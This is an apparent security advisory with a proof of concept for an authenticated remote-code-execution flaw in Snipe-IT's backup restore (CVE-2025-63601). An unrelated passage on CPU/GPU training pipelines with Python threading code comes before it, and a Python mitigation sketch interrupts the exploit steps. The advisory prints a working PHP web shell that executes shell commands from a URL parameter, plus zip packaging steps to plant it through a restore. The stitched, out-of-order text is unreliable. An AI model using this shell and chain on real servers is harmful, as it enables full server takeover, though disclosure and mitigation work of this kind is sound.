Once the data is ready, the CPU can transfer it to the GPU, which takes over the more computationally intensive tasks, such as backpropagation, matrix multiplication, and gradient calculations. This division of labor allows CPUs to focus on less demanding tasks, while GPUs handle the heavy lifting required for training AI models efficiently. 
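This division of labor can be sketched with standard-library threads: a producer plays the CPU's preprocessing role and a consumer simulates the batched "GPU" compute. All names, the doubling "preprocess" step, and the batch size are illustrative assumptions; in a real framework the same producer-consumer pattern appears as CPU data-loader workers feeding a training loop on an accelerator.

```python
import queue
import threading

def cpu_preprocess(raw: int) -> int:
    """Stand-in for cleaning/normalizing one record on the CPU."""
    return raw * 2

def run_pipeline(raw_data, batch_size: int = 4):
    batches = queue.Queue()
    results = []

    def producer():
        # CPU side: refine items one by one and hand over full batches.
        batch = []
        for item in raw_data:
            batch.append(cpu_preprocess(item))
            if len(batch) == batch_size:
                batches.put(batch)
                batch = []
        if batch:
            batches.put(batch)
        batches.put(None)  # sentinel: no more work

    def consumer():
        # "GPU" side: heavy batched computation (here just a sum per batch).
        while (batch := batches.get()) is not None:
            results.append(sum(batch))

    t1 = threading.Thread(target=producer)
    t2 = threading.Thread(target=consumer)
    t1.start(); t2.start()
    t1.join(); t2.join()
    return results

# run_pipeline(range(8)) preprocesses 0..7 into 0,2,...,14, then the consumer
# reduces two batches of four: [12, 44].
```

The queue decouples the two sides, so the "CPU" can keep preparing the next batch while the "GPU" is busy with the current one, which is exactly the overlap hybrid frameworks aim for.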

CVE-2025-63601: (Proof-of-Concept Included) Authenticated RCE via Backup Restore in Snipe-IT

17:20 28/11/2025
Safe Version: Snipe-IT 8.3.3 and later are not affected by this vulnerability.

1. CVE Reference

For basic vulnerability information, please refer to:

https://www.cve.org/CVERecord?id=CVE-2025-63601
https://nvd.nist.gov/vuln/detail/CVE-2025-63601

CVE-2025-63601 describes an issue where Snipe-IT's backup restoration mechanism fails to properly validate file types and extraction paths inside uploaded archives, allowing an attacker to smuggle malicious executable files into web-accessible directories. This ultimately enables arbitrary code execution on the server.

2. How FPT AppSec Flagged the Issue & How Our Engineers Traced the Root Cause

During internal security testing using FPT AppSec, the service highlighted a suspicious area within the Backup Restore feature of Snipe-IT. The scanner produced a warning related to improper file handling and the potential for malicious file extraction inside the public/uploads directory. This indicated a possible Unrestricted File Upload or Archive Extraction Bypass vulnerability.

From that point, our engineering team began a manual deep-dive investigation. By reviewing the Snipe-IT codebase and analyzing the flow produced by the scanner, we located the root cause inside:

app/Console/Commands/RestoreFromBackup.php

Missing extension validation for directory files

The application defined allowed extensions but only applied them to a small subset of files (private/public logo files). Files inside directories extracted from the backup were never checked, meaning .php, .phtml, .htaccess, or any other executable file could be stored inside web-accessible directories such as:

public/uploads/accessories/
public/uploads/assets/

Incorrect path whitelisting logic

Certain upload directories were whitelisted without sufficient validation or constraint, enabling extraction of attacker-controlled files into the DocumentRoot.
Direct RCE possibility

Because the extracted files were placed under the public/ directory, they were directly accessible from the browser, resulting in instant remote code execution. The full chain matched the CVE description and confirmed a real-world exploit scenario.

3. Full Proof-of-Concept (PoC)

This PoC is taken directly from our validated security report (included in the markdown file) and demonstrates the complete exploitation path.

Step 1 — Prepare a Malicious Backup Archive

Create a simple PHP web shell:

[code lang="shell"]
cat > public/uploads/accessories/shell.php << 'EOF'
<?php
if (isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Shell ready. Use ?cmd=command";
}
?>
EOF
[/code]

Create a minimal SQL file required by the backup format:

[code lang="shell"]
cat > database.sql << 'EOF'
-- Snipe-IT Database Backup
-- Generated for RCE PoC
CREATE TABLE IF NOT EXISTS poc_test (id INT);
INSERT INTO poc_test VALUES (1);
EOF
[/code]

Package everything into a fake backup:

[code lang="shell"]
zip -r ui_rce_backup.zip public/ database.sql
[/code]

This archive now contains:

[code lang="shell"]
public/uploads/accessories/shell.php   ← malicious file
database.sql                           ← valid structure
[/code]

Step 2 — Restore the Backup in Snipe-IT

Log in as an administrator.
Navigate to: Admin → Settings → Backups
Upload ui_rce_backup.zip
Click Restore (no need to clean the database)

The application extracts the entire public/uploads/... structure, including your shell.php, without validating extensions. As shown in the internal analysis screenshot, the file is written into:

/var/www/html/public/uploads/accessories/shell.php

Step 3 — Execute Commands via the Web Shell

This confirms Remote Code Execution.
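The actual fix ships in Snipe-IT's PHP restore command, but the two missing checks are language-agnostic. The sketch below (in Python, with an assumed illustrative allowlist) shows what a safe restore routine looks like: extension validation applied to every archive entry, and path containment so entries cannot escape the destination directory.

```python
import os
import zipfile

# Illustrative allowlist of file types a restore routine might legitimately
# expect inside public/uploads (an assumption for this sketch, not the
# project's actual configuration).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".svg", ".csv"}

def safe_restore(archive_path, dest_dir):
    """Extract only allowlisted file types, and only inside dest_dir.

    Demonstrates the two checks the vulnerable restore path skipped:
    1) extension validation for every archive entry, not just a small
       subset of files;
    2) path containment, so entries using '../' cannot escape dest_dir.
    """
    extracted = []
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(archive_path) as zf:
        for entry in zf.infolist():
            if entry.is_dir():
                continue
            ext = os.path.splitext(entry.filename)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                continue  # reject .php, .phtml, .htaccess, ...
            target = os.path.realpath(os.path.join(dest_root, entry.filename))
            if not target.startswith(dest_root + os.sep):
                continue  # reject traversal outside the destination root
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(entry) as src, open(target, "wb") as dst:
                dst.write(src.read())
            extracted.append(entry.filename)
    return extracted
```

Fed the PoC archive above, a routine like this would silently drop shell.php at the extension check, closing the RCE chain before any file reaches the DocumentRoot.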
Conclusion

FPT AppSec Research Team successfully reproduced CVE-2025-63601 and demonstrated a real attack chain showing:

- Archive entries were not validated
- Dangerous executables were written directly to web-accessible directories
- A simple PHP uploader inside the backup results in full RCE